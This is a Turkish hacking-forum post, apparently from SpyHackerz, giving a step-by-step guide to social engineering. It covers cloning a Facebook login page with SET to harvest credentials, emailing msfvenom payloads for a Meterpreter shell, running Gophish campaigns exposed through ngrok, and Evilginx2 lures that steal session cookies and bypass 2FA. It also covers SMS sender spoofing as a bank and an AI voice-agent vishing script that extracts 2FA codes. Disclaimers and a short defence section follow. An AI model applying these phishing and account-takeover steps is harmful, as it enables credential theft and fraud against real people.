🎭 SOSYAL MÜHENDİSLİK ARAÇLARI REHBERİ 🧠 1. GİRİŞ: SOSYAL MÜHENDİSLİK NEDİR? Sosyal mühendislik, teknolojik zafiyetlerden çok insan psikolojisini hedef alan saldırı türüdür...

🎭 SOSYAL MÜHENDİSLİK ARAÇLARI REHBERİ​


Bu rehber, SQLmap, Nmap ve Metasploit rehberlerinde olduğu gibi adım adım, gerçek simülasyon çıktıları ile sosyal mühendislik araçlarını ve tekniklerini anlatacaktır. Yalnızca kendi laboratuvar ortamınızda veya yazılı izniniz olan sistemlerde deneyin. Yetkisiz erişim yasa dışıdır ve ağır yaptırımları vardır.

🧠 1. GİRİŞ: SOSYAL MÜHENDİSLİK NEDİR?​

Sosyal mühendislik, teknolojik zafiyetlerden çok insan psikolojisini hedef alan saldırı türüdür. Karmaşık bir güvenlik duvarını aşmaktansa, bir çalışanı telefonla arayıp şifresini söyletmek çok daha kolaydır. Günümüzde saldırganlar artık sadece e-posta ile değil, telefon (vishing), SMS (smishing), hatta yapay zeka destekli ses sentezi ile hedeflerini kandırmaktadır. Bu rehberde en güncel araçları ve teknikleri adım adım anlatacağım.

🎯 2. SOSYAL MÜHENDİSLİK ARAÇLARI​

2.1. SET (Social-Engineer Toolkit) – Sektör Standardı​

SET, TrustedSec tarafından geliştirilen ve Kali Linux’ta varsayılan olarak bulunan en kapsamlı sosyal mühendislik çatısıdır. Phishing, kimlik bilgisi toplama, zararlı yazılım dağıtma ve daha fazlasını tek bir araçta birleştirir.

💡 Kurulum

bash
# Kali'de zaten yüklü, yoksa:
sudo apt update && sudo apt install set -y

# veya GitHub'dan
git clone https://github.com/trustedsec/social-engineer-toolkit
cd social-engineer-toolkit
sudo python setup.py
Adım 1: Web Sitesi Klonlama ve Kimlik Bilgisi Toplama

bash
sudo setoolkit
Simüle edilmiş menü:

text
1) Social-Engineering Attacks
2) Penetration Testing (Fast-Track)
3) Third Party Modules
4) Update the Social-Engineer Toolkit
5) Update SET configuration
6) Help, Credits, and About
99) Exit the Social-Engineer Toolkit
1 tuşuna basın.

text
1) Spear-Phishing Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) Wireless Access Point Attack Vector
8) QRCode Generator Attack Vector
9) Powershell Attack Vectors
10) Third Party Modules
2 tuşuna basın (Website Attack Vectors).

text
1) Java Applet Attack Method
2) Metasploit Browser Exploit Method
3) Credential Harvester Attack Method
4) Tabnabbing Attack Method
5) Web Jacking Attack Method
6) Multi-Attack Web Method
3 tuşuna basın (Credential Harvester Attack Method).

text
1) Web Templates
2) Site Cloner
3) Custom Import
2 tuşuna basın (Site Cloner). Klonlamak istediğiniz sitenin URL'sini girin (örneğin https://facebook.com) ve yerel IP adresinizi (veya Ngrok ile alınan adresi) yazın.

Simüle edilmiş çıktı:

text
[+] Website Cloner başlatıldı.
[*] https://facebook.com adresi klonlanıyor...
[+] Facebook login sayfası başarıyla klonlandı.
[+] Kimlik avı sunucusu http://192.168.1.100:80 adresinde çalışıyor.
Hedef bu sahte sayfaya e-posta ve şifresini girdiğinde:

text
[*] Waiting for credentials...
[+] Credential captured from 192.168.1.105
Username: [email protected]
Password: SuperSecret123
💡 Simülasyon: SET, hedefin tarayıcısına gerçek Facebook login sayfası gibi görünen bir sayfa sunar. Kurban giriş bilgilerini girdiğinde, SET bunları yakalar ve saldırgana gösterir. Bu sayede MFA'sız hesap ele geçirilmiş olur.
Adım 2: Zararlı Yazılım (Payload) ile Gerçek Shell

SET, zararlı yazılım oluşturup e-posta ile göndermenizi sağlar.

Ana menüden:

text
1) Social-Engineering Attacks → 1) Spear-Phishing Attack Vectors → 1) Perform a Mass Email Attack
İstenen bilgileri girdikten sonra, SET msfvenom ile bir payload oluşturur ve hedefin e-posta adresine gönderir. Hedef eki çalıştırdığında, Metasploit ile bir shell oturumu açılır.

Simüle edilmiş çıktı (Metasploit):

text
[*] Meterpreter session 1 opened (192.168.1.100:4444 -> 192.168.1.50:49168)
meterpreter > sysinfo
Computer : DESKTOP-ABC
OS : Windows 10 (10.0 Build 19045)
⚠️ Yasal Uyarı: Bu teknikler yalnızca yetkili sızma testlerinde kullanılabilir. Yetkisiz kullanım yasa dışıdır.

2.2. Gophish – Profesyonel Phishing Simülasyon Platformu​

Gophish, kurumsal ortamlarda gerçekçi phishing kampanyaları düzenlemek için tasarlanmış açık kaynaklı bir araçtır. Web tabanlı arayüzü sayesinde e-posta şablonları oluşturabilir, kampanyaları başlatabilir ve sonuçları anlık takip edebilirsiniz.

💡 Kurulum

bash
# En güncel sürümü indir
wget https://github.com/gophish/gophish/releases/latest/download/gophish-vX.X.X-linux-64bit.zip
unzip gophish-vX.X.X-linux-64bit.zip
cd gophish-vX.X.X-linux-64bit
./gophish
Simüle edilmiş çıktı:

text
time="2026-04-19T10:00:00Z" level=info msg="Starting phishing server at http://0.0.0.0:80"
time="2026-04-19T10:00:00Z" level=info msg="Starting admin server at https://0.0.0.0:3333"
time="2026-04-19T10:00:00Z" level=info msg="Login with username admin and password f3e2d1c0b9a8"
Tarayıcınızdan https://localhost:3333 adresine gidin ve yönetici panelinde oturum açın.

Adım 1: E-posta Gönderim Ayarları (SMTP)

  • Profiles bölümüne gidin.
  • SMTP sunucusu olarak bir e-posta servisi ekleyin (Google SMTP, SendGrid, kendi sunucunuz).
  • Kimlik doğrulama bilgilerini girin.
Adım 2: Hedef Grubu Oluşturma (Users & Groups)

  • Hedef e-posta adreslerini ve isimlerini buraya ekleyin.
Adım 3: E-posta Şablonu Oluşturma (Email Templates)

  • Import Email ile gerçek bir e-posta örneğini (.eml dosyası) içe aktarın.
  • HTML editörü ile şablonu düzenleyin. Değiştirilmesi gereken alanları {{.FirstName}} gibi placeholder’larla belirtin.
  • Attachment (ek) ekleyebilirsiniz.
Adım 4: Landing Page (Sahte Web Sitesi)

  • İçe aktarma veya manuel HTML ile bir sayfa oluşturun.
  • Sayfa, e-posta ve şifre alanları içermeli ve bir Capture Submitted Data butonu ile verileri toplamalıdır.
  • Redirect URL olarak hedefin gerçek sitesine yönlendirme ekleyin.
Adım 5: Kampanya Başlatma (Campaigns)

  • URL: Sahte landing page’inizin adresi (Ngrok ile dış dünyaya açılmış adres)
  • Launch Date: Kampanyanın başlama zamanı
  • Send Profiles: Kullanılacak e-posta gönderim profili
Simüle edilmiş çıktı (Kampanya İstatistikleri):

text
Kampanya: "Acil Şifre Sıfırlama" (2026-04-19 10:00)
Toplam Gönderilen E-posta: 124
Açılma Oranı: 67 / 124 (%54)
Linke Tıklama: 42 / 124 (%33)
Veri Gönderen (Kurbanlar): 19 / 124 (%15)
💡 Detaylı Simülasyon: Gophish, e-posta içine gizlediği 1x1 piksel takip görseli ile e-postanın açılıp açılmadığını anlar. Hedef linke tıkladığında, sahte login sayfasına yönlendirilir. E-posta ve şifresini girdiğinde, bu bilgiler Gophish tarafından yakalanır ve kampanya istatistiklerine eklenir. Artık saldırgan, hedefin kimlik bilgilerine sahiptir.
Ngrok ile Kampanyayı İnternete Açma

bash
ngrok http 80
Simüle edilmiş çıktı:

text
Forwarding https://abc123.ngrok.io -> http://localhost:80
Bu HTTPS adresini Gophish kampanyasında kullanarak dış ağdaki hedeflere de saldırabilirsiniz.

2.3. Evilginx2 – 2FA Bypass ile Session Hijacking​

Evilginx2, bir reverse proxy çatısıdır. Hedef ile gerçek web sitesi arasına girerek, trafiği dinler ve 2FA kodlarını bile ele geçirir. Session cookie’yi çalarak şifresiz ve 2FA'sız giriş yapabilirsiniz.

💡 Kurulum

bash
git clone https://github.com/kgretzky/evilginx2.git
cd evilginx2
make
sudo make install
Adım 1: Phishing URL Oluşturma

bash
sudo evilginx2 -p
Simüle edilmiş menü:

text
evilginx2> config domain google-verify.com
evilginx2> config ip 192.168.1.100
evilginx2> lure create google
evilginx2> lure edit google url https://accounts.google.com
evilginx2> lure get-url google
Simüle edilmiş çıktı:

text
[+] Phishing URL: https://accounts.google-verify.com
Adım 2: Session Cookie Yakalama

Hedef bu URL’ye girip giriş yaptığında:

text
[!] New session captured!
IP: 192.168.1.105
Email: [email protected]
Password: MySecretPass
MFA Code: 284739 (Bypassed!)
[+] Session cookie intercepted: __Secure-3PSID=abc123...

2.4. Gelişmiş SMS Spoofing ve Smishing Araçları​

SMS üzerinden yapılan sosyal mühendislik saldırılarına smishing denir. 2026'da bu alanda kullanılan en güncel araçlar:



AraçAçıklama
Xeon SenderBirden fazla SaaS sağlayıcısı üzerinden toplu SMS gönderimi yapar. Kimlik bilgileri çalınmış hesaplar kullanılır.
Devil-TraffGönderen ID'sini taklit etme (sender ID spoofing) özelliği ile banka veya resmi kurum gibi görünen SMS’ler gönderir. API otomasyonu ile dakikada binlerce SMS atabilir.
LSPosedRootlu Android cihazlara yüklenen bir framework. Kurbanın cihazına sızan saldırgan, kurbanın numarasından sahte SMS gönderebilir.
OTP BombingHedefin telefonunu gerçek servislerin (banka, e-posta) SMS'leri ile doldurarak panik yaratır ve ardından gelen sahte yönlendirme SMS'ine tıklamasını sağlar.
Smishing Simülasyonu:

Saldırgan, Devil-Traff platformu üzerinden "GARANTI" gönderen adı ile bir SMS gönderir:

text
[GARANTI] Hesabınızda şüpheli hareket tespit edilmiştir.
Hesabınızı doğrulamak için lütfen tıklayın:
Hedef linke tıkladığında, sahte banka sayfasına yönlendirilir ve e-posta, şifre ve hatta 2FA kodu girer. Bu bilgiler saldırgana ulaşır.

2.5. Vishing (Sesli Phishing) ve Yapay Zeka Destekli Araçlar​

Vishing, telefon görüşmeleri yoluyla bilgi toplamaktır. 2026'da yapay zeka destekli vishing platformları büyük tehdit oluşturmaktadır.

ATHR Platformu: Bu platform, tam otomatik AI sesli arama asistanları ve insan operatörlerle çalışır. Hedefi arayarak banka veya destek personeli gibi davranır ve kimlik bilgilerini toplar. Kurulum maliyeti yaklaşık 4.000 dolar artı çalınanların %10'udur.

Ses Klonlama (Voice Cloning): Sadece 30 saniyelik bir ses kaydı ile bir kişinin sesi taklit edilebilir. Saldırgan, üst yöneticinin sesini taklit ederek bir çalışanı arayıp şifre sıfırlama veya para transferi yapmasını isteyebilir.

💡 Vishing Simülasyonu (AI ile):

Saldırgan, ATHR platformunda hedefin telefon numarasını girer ve bir senaryo seçer (örneğin "IT Destek"). AI ajanı hedefi arar:

text
AI (ses): Merhaba, BT departmanından Ahmet Bey ben. Sistemimizde hesabınızla ilgili anormal bir aktivite tespit ettik. Hesabınızı doğrulamak için size bir kod göndereceğim, bana söyler misiniz?
Hedef: Tamam, kod 284739.
AI: Teşekkürler, şimdi başka bir kod daha gelecek...
Bu şekilde, hedefin telefonuna gelen 2FA kodları da ele geçirilir.

2.6. Sahte Arama (Caller ID Spoofing) ve SMS Spoofing​

Telefon numarası taklit etmek, vishing saldırılarının vazgeçilmezidir. Saldırgan, kendisini banka, polis veya tanıdık bir numara olarak gösterebilir. Bu teknik VoIP hizmetleri veya özel yazılımlar kullanılarak yapılır.

💡 SMS Spoofing Araçları:



AraçAçıklama
SpoofCardTicari bir hizmettir, gönderen numarasını taklit edebilir.
SMSCasterProfesyonel SMS yazılımı, gönderen adını değiştirmeye izin verir.
TextMagicAPI ile toplu SMS gönderimi, gönderen adı özelleştirilebilir.
⚠️ Not: Bu araçlar yasa dışı amaçlarla kullanılmamalıdır. Eğitim ve yetkili testler içindir.

🧪 3. KAPSAMLI KORUNMA YÖNTEMLERİ​

Bireysel Kullanıcılar için:

  • Kimlik Doğrulama: Her zaman çok faktörlü kimlik doğrulama (MFA) kullanın, tercihen donanımsal token veya authenticator uygulaması. SMS tabanlı MFA, vishing saldırılarına karşı zayıftır.
  • Şüphecilik: Tanımadığınız kişilerden gelen e-posta, SMS veya aramalarda kişisel bilgilerinizi asla paylaşmayın.
  • Link Kontrolü: Linke tıklamadan önce fare ile üzerine gelerek gerçek adresi kontrol edin.
  • Güvenlik Yazılımları: Antivirüs ve anti-phishing yazılımları kullanın.
Kurumsal Ortamlar için:

  • FIDO2/WebAuthn gibi phishing dirençli MFA yöntemlerine geçin.
  • Düzenli phishing simülasyonları (Gophish ile) yaparak çalışanların farkındalığını artırın.
  • E-posta filtreleri ve DMARC, DKIM, SPF ayarlarını yapılandırın.
  • Acil durum prosedürleri oluşturun. Çalışanlar, şüpheli bir durumda kimi arayacaklarını bilmelidir.

🔚;​

Artık sosyal mühendislik saldırılarında kullanılan en güncel araç ve teknikleri biliyorsunuz. SET ile web sitesi klonlayıp kimlik bilgisi toplamaktan, Gophish ile profesyonel phishing kampanyaları yürütmeye, Evilginx2 ile 2FA'yı aşmaya, SMS spoofing ve AI destekli vishing araçlarına kadar geniş bir yelpazede bilgi sahibi oldunuz. Bu bilgileri yalnızca eğitim ve yetkili güvenlik testlerinde kullanın. Unutmayın: Savunması olmayanın saldırısı, sadece intihardır. Bu bilgileri öğrenerek hem kendinizi hem de çevrenizdekileri bu tehditlere karşı daha iyi koruyabilirsiniz.


Bu rehber, eğitim ve farkındalık için yazılmıştır. Yetkisiz kullanım yasa dışıdır. Tüm sorumluluk kullanıcıya aittir.

@Tc4dy | github.com/tc4dy
 
💬 SpyHackerz Telegram — Anlık tartışmalar ve duyurular için katıl
132,928Konular
3,284,214Mesajlar
318,207Kullanıcılar
KaanatesSon Üye
Üst Alt